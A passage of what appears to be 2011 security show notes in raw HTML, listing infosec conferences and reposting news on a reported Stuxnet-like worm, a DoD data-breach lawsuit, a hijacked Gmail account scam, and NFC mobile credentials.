	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Microsoft Technology Center Dallas</span></a><br />
	<a href="http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011<br class="kix-line-break" /><br />
	</span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2011 Fall Information Security Conference</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 8 &#8211; 9, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA (Loudermilk Conference Center)<br class="kix-line-break" /><br />
	</span><a href="http://www.gaissa.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gaissa.org</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.isssource.com/a-new-and-frightening-stuxnet/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isssource.com/a-new-and-frightening-stuxnet/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Facing mounting concern about Iran&rsquo;s nuclear program, a top U.S. and Israeli technical team has developed a computer &ldquo;malworm&rdquo; designed to take down all of Iran&rsquo;s computer software.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">ISSSource</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> has learned leaders of the three major software companies, Sergey Brin at Google, Steve Ballmer at Microsoft and Larry Ellison at Oracle have been working with Israel&rsquo;s top cyber warriors and have now come up with new version of a Stuxnet-like worm that can bring down Iran&rsquo;s entire software networks if the Iranian regime gets too close to a breakout, according to U.S. intelligence sources. Google, Microsoft and Oracle had no comment on the issue.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Cyber warfare is a lot like biological warfare. It&rsquo;s hard to stop. It&rsquo;s uncontrollable. It can bite you in the ass,&rdquo; said one U.S. official.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This new version of Stuxnet was, until recently, seen as a tool to derail any notions of an Israel military surgical strike on Iran with the United States in a supporting role. During his visit to Israel, Secretary of Defense Leon Panetta carried a U.S. message to Tel Aviv that President Barack Obama would not support a military strike on Iran, said a U.S. official, who spoke under the condition of anonymity. Israeli plans for an attack had alarmed the National Security Council and the Senate foreign policy committee when briefed on the Israeli proposal.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;They were in shock afterwards,&rdquo; the U.S. official said.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since early June, U.S. intelligence experts have warned of an Israeli attack on Iran before the UN meeting on the question of Palestinian statehood. Those warnings came at the same time as when then Secretary of Defense Robert Gates left office in June or when Joint Chiefs of Staff head Adm. Mike Mullen was preparing for his September retirement.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Throughout the summer, U.S. officials have strenuously resisted the urgings of Israeli Prime Minister Benjamin Netanyahu for a preemptive strike. Several senior U.S. intelligence officials confirmed large contingency planning drills for an intervention if Israel attacked Iran. Planning for such an intervention was seen as &ldquo;pretty far advanced,&rdquo; a U.S. official said in August.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">These officials reported they were resisting such notions with all the force they can. But one cautioned, &ldquo;This is no drill.&rdquo;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Matters became more complicated when the FBI uncovered an Iranian terrorist operation targeted in Washington, DC, that could have supported long-time American hard liners as well as Israeli supporters of some type of military attack on Iran.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Compounding that is the Saudi position informing President Obama the Saudis strongly support a military campaign against Iran. Saudi officials are now signaling the Israelis Saudi King Abd&rsquo;allah is in favor of a strike on Iran.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This new Stuxnet worm is being advanced by administration and intelligence officials as a more powerful tool with more range and a stronger capability than the previous version. Officials want this new cyber capability to derail any military action that could result in a regional war.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Stuxnet attack on Iran&rsquo;s nuclear plants in Bushehr and Natanz in 2010 was the result of a joint effort between the United States and the cyber warfare experts of Israel&rsquo;s Mossad and the IDF Unit 8200. The attack wrecked havoc on Iran&rsquo;s nuclear program for 11 months, U.S. officials confirmed.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">These officials verified Israeli assertions that Iran never overcame the disruptions caused by Stuxnet nor did it manage to restore its centrifuges to smooth and normal operation as was claimed.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">U.S. intelligence sources current and former, said Iran finally was forced to scrap tainted machines and replace them with new ones.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Iran provided confirmation of this July 19 when a senior Iranian official said improved and faster centrifuge models were being installed.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sources differ on the number of centrifuges replaced. One former U.S. intelligence official said at least 1,000 machines had been replaced. Israeli intelligence sources put the number as high as 5,000. U.S. sources believe the actual estimate to be lower.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Iran has an illegal procurement system for the machines and it makes the system vulnerable to attack,&rdquo; said one former U.S. intelligence official with knowledge of the matter. The reason it is vulnerable to attack is because the CIA has penetrated Iran&rsquo;s dummy procurement companies in order to plant design and other flaws that will cause the system to malfunction if Iran tries to use it. As a former CIA official said, &ldquo;When Tehran throws a switch, nothing will happen.&rdquo;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In spite of U.S. intelligence operations to hamper or thwart any progress on Iran&rsquo;s nuclear program, Israel continues to claim in recent months Iran has taken advantage of the West&rsquo;s fixation with the Arab Spring to forge ahead unnoticed with its weapons program.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">U.S. officials dismissed this claim by the Israelis, pointing out it was hard to argue on one hand that a &ldquo;malworm&rdquo; had severely damaged Iran&rsquo;s system to the point where it has having to replace its machines and then on the other hand boast of ongoing secret progress. &ldquo;That nonsense is for Israeli hawks like Netanyau,&rdquo; one source said.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Anyone who argues about secret progress in Iran&rsquo;s program had better come up with hard evidence of it. We do not possess such evidence,&rdquo; a former senior intelligence official said. </span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.scmagazine.com.au/News/277092,us-defense-faces-49b-lawsuit-for-unencrypted-data-breach.aspx"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.scmagazine.com.au/News/277092,us-defense-faces-49b-lawsuit-for-unencrypted-data-breach.aspx</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The US Department of Defense is facing a $4.9 billion class-action lawsuit stemming from the breach of computer backup tapes containing the personal information of nearly five million current and former US soldiers.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The data was stolen from</span><a href="http://www.scmagazine.com.au/News/275269,five-million-unencrypted-us-soldier-records-stolen-from-car.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">unencrypted backup tapes stored inside a car</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The lawsuit was filed last week in US District Court in Washington by four individuals whose information was compromised.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It seeks $1000 in damages for all 4.9 million individuals affected by the incident.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The suit charges that defendants Tricare, a health insurance provider for military personnel and their families, as well as the Defense Department and Leon Panetta, the agency&#39;s secretary, violated individuals&#39; privacy rights by failing to protect the stolen information from unauthorised disclosure.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The suit contends that the defendants failed to properly encrypt the data, then &ldquo;intentionally, willfully and recklessly&rdquo; allowed an untrained individual to access the information.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Making matters worse, the defendants then authorised this worker to take the data off government premises.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the suit, the defendants violated the US Privacy Act that governs the collection, maintenance, use and dissemination of personally identifiable information maintained by federal agencies, as well as other privacy laws.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The breach, first disclosed in late September, affected those who, from 1992 to 7 September this year, sought care at military treatment facilities in the San Antonio, Texas area.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The stolen data belonged to Tricare, but had been entrusted to Science Applications International Corp. (SAIC), a high-tech defense contractor.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The tapes were stolen from a SAIC employee&#39;s car. SAIC was not named as a defendant in the lawsuit.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The stolen data included Social Security numbers, addresses and phone numbers, in addition to health assets, such as clinical notes, lab test reports and prescription information.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The plaintiffs of the suit are an Air Force veteran, a military spouse and her two children, all of whom received insurance through Tricare.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Because of the breach, the defendants suffered emotionally and lost money as a result of having to purchase credit monitoring solutions.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tricare downplayed the impact of the breach in September, noting that the risk of harm to affected individuals was &ldquo;low&rdquo; since retrieving data off the tapes would necessitate &ldquo;knowledge of and access to specific hardware and software, and knowledge of the system and data structure.&rdquo;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Defense Department spokesman did not respond to a request for comment on Monday.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.guardian.co.uk/technology/2011/oct/16/email-hacker-identity-rowenna-davis"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.guardian.co.uk/technology/2011/oct/16/email-hacker-identity-rowenna-davis</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A hacker has been occupying my email account for the past week. And he or she may still be there. A disembodied intruder, this person has been stalking my inbox, replying to messages, signing off with my nickname and refusing to let me in. They have been going through my personal history and making judgments about my character. In the weirdest twist, the hacker even started writing to me. If it wasn&#39;t so unsettling, it could be the plot of a black postmodern comedy.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It started when my phone went crazy in the middle of a crucial meeting. Some 5,000 contacts received an email from my account saying that I&#39;d been held up at gunpoint in Madrid. My internet-savvy friends sent texts to say I&#39;d been hacked, while my elderly, migrant and more vulnerable friends wanted to know where to send the cash. According to the story, my mobile phone and credit cards had been taken and I was badly in need of money. There was a number to call to reach me at my hotel &ndash; presumably chargeable &ndash; and a Western Union account had been set up in my name to wire a transfer.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Suddenly you&#39;re hit with an organisational bombshell &ndash; drop what you&#39;re doing; freeze your bank account; answer anxious calls; lose crucial, last-minute messages; miss work deadlines; irritate bosses; reset all email-based passwords; forget to pay e-bills; irritate friends who think you&#39;re ignoring them. The realisation dawns that the email account is the nexus of the modern world. It&#39;s connected to just about every part of our daily life, and if something goes wrong, it spreads. But the biggest effect is psychological. On some level, your identity is being held hostage.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Out of sheer frustration, I fired off an email to my occupied address labelled &quot;to those who hacked my account&quot;, laying out how I felt and asking for my contacts. Shockingly, I got an almost instantaneous reply. The hacker said they would return my address book for &pound;500. It was unreal. There I was, sitting at my laptop, alone in my flat, receiving emails from someone claiming to be me. Whoever it was must have been sitting watching my account and responding in real time. Who else was this person replying to in the same way?</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I wrote back straight away, saying that I didn&#39;t have those kind of finances and pointing out that I had no reason to believe the deal would be kept even if I did send the money. I couldn&#39;t help but end with a rhetorical: &quot;Do you ever feel even slightly bad about what you are doing?&quot;</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Just for a minute, the hacker seemed anxious to prove that he or she had some sense of morality. According to this individual, it &quot;didn&#39;t feel great&quot; to be a hacker. They said they didn&#39;t have a choice. I immediately asked why. They said their life &quot;wasn&#39;t as nice and sweet&quot; as mine. In what I guess was supposed to be a gesture of magnanimity, this individual said that they would release my contacts for just &pound;300, and even offered to send me 20 contacts upfront as a sign of &quot;goodwill&quot;. You could tell this person thought they were being reasonable &ndash; they insisted that their actions weren&#39;t as bad as robbing people on the streets.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">What I wanted to reply, but found difficult to articulate at the time, was that hacking can be worse than that. When someone holds you up in the street, you lose a set of isolated possessions and then get to walk away. But if someone colonises one of your chief platforms of interaction with the world, there&#39;s always a feeling of &quot;what next?&quot; They can read your most intimate emails and potentially pass them on. A simple search would allow them to find out not just my address, but also those of my friends and family &ndash; something that crossed my mind when I registered my case with the police.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apparently some 3,000 people reported such scams last year, but too few of these are brought to justice. The police haven&#39;t even returned my call for a full report. When I did eventually get access to my account back through</span><a href="http://www.guardian.co.uk/technology/gmail"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Gmail</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> a week later, I found that the hacker had personally written to more than 30 people who had asked about my problems in Madrid. The intruder said I&#39;d had a &quot;terrible experience&quot; and signed off with my nickname, &quot;Row&quot;. The fact that someone could be so callous to people who cared about me &ndash; all in my name &ndash; left me furious.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I was lucky. The only reason I was able to regain access to my account was through chance &ndash; a friend of a friend works at Google. Until then, my hacker had given me better feedback than Gmail and Google, following my attempts to get in touch with them. The company that presents itself as the friendly face of the web doesn&#39;t have a single human being to talk to in these circumstances. The UK office just cut me off and, after a friend waited 20 minutes to ask the head US team if there was anything that could be done to help, they received a simple &quot;nope&quot;.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When someone did bother to look into my problem, it only took five minutes to fix. The hacker had doubled the verification process on my password so I couldn&#39;t get in. Once Google disabled it from the inside, I was able to reset all my security checks without a problem.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Even now, I&#39;m not sure it&#39;s over. In one last message, addressed from myself just two days ago, the hacker wrote: &quot;I see you got the account back. Sorry for the trouble.&quot; I never replied, so I guess I&#39;ll never know what this individual&#39;s circumstances were. But I feel the need to understand them. Perhaps we believe that if we find reasons for things, we&#39;ll feel safer. Perhaps it&#39;s about restoring a bit more faith in human nature. Either way, my hacker seems to have disappeared back into the 21st-century ether. Although, of course, they could be reading this now.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Say &ldquo;mobile wallet&rdquo; and most people think payment&ndash;tapping your phone against a reader instead of swiping a card. But the phrase may soon come to encompass not just your credit card, but your entire wallet: loyalty cards, work ID, access credentials and all&ndash;and potentially even the keys jingling in your pocket.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since NFC uses the same standard as contactless smart cards, the technology could enable employers to take existing smart ID cards that are used to get into the office and transfer it over to the phone&ndash;a process called &ldquo;card emulation.&rdquo; Making this a reality, however, is not as easy as it sounds, explains to Jeff Fonseca, director of business development and sales at NXP Semiconductors.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;It&rsquo;s not like you can just take somebody&rsquo;s badge and put it on a phone and have it just work everywhere,&rdquo; says Fonseca. &ldquo;It doesn&rsquo;t work that way.&rdquo;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The market is split with different companies providing different &ldquo;flavors&rdquo; of contactless technologies in different parts of the world. According to Fonseca, this makes interoperability a big hurdle.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Agreements need to be in place to replicate card types, cryptography and unique IDs to NFC devices. Credential vendors such as NXP, HID Global, LEGIC and Sony will need to authorize one or more parts of the mobile chain&ndash;the NFC chip, the handset, the mobile operator&ndash;to enable card emulation.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;You can&rsquo;t just copy the credentials and (use) a different unique ID &hellip; it won&rsquo;t work,&rdquo; Fonseca says. &ldquo;You have to have a commercial agreement with the enterprise to replicate and make those credentials virtual onto the phone.&rdquo;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">These obstacles, though relevant, are less daunting for real world physical access systems than for a future globally interoperable vision. Most organizations select a single type of contactless credential to issue to employees. There may also be a preferred mobile operator and handset. Thus it is not a requirement that every flavor of contactless credential be approved for all handsets to have a working solution.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Making all this work together will not fall to the issuing organizations. Rather, contactless providers will work with the mobile chain to offer solutions to issuers. In the near term, it is likely that the contactless provider will have one or more approved handsets and/or mobile operators that issuers can opt to deploy. It is likely that the current network of system integrators that provides hardware and cards to issuers will offer these new emulated NFC cards as a future option.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To be clear, this work is ongoing and it is true that there are very few NFC-enabled handsets on the market today. But these limitations are temporary, according to Fonseca. &ldquo;The industry is moving in this direction,&rdquo; he says, adding that there are significant benefits to justify the switch to mobile.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unlike plastic cards, which are static, a mobile phone can be constantly updated with new permissions and apps for changing needs. Because NFC-equipped handsets can be updated dynamically over the air, new credentials can be provisioned without requiring the employee to physically visit company security or human resources.</span></p>
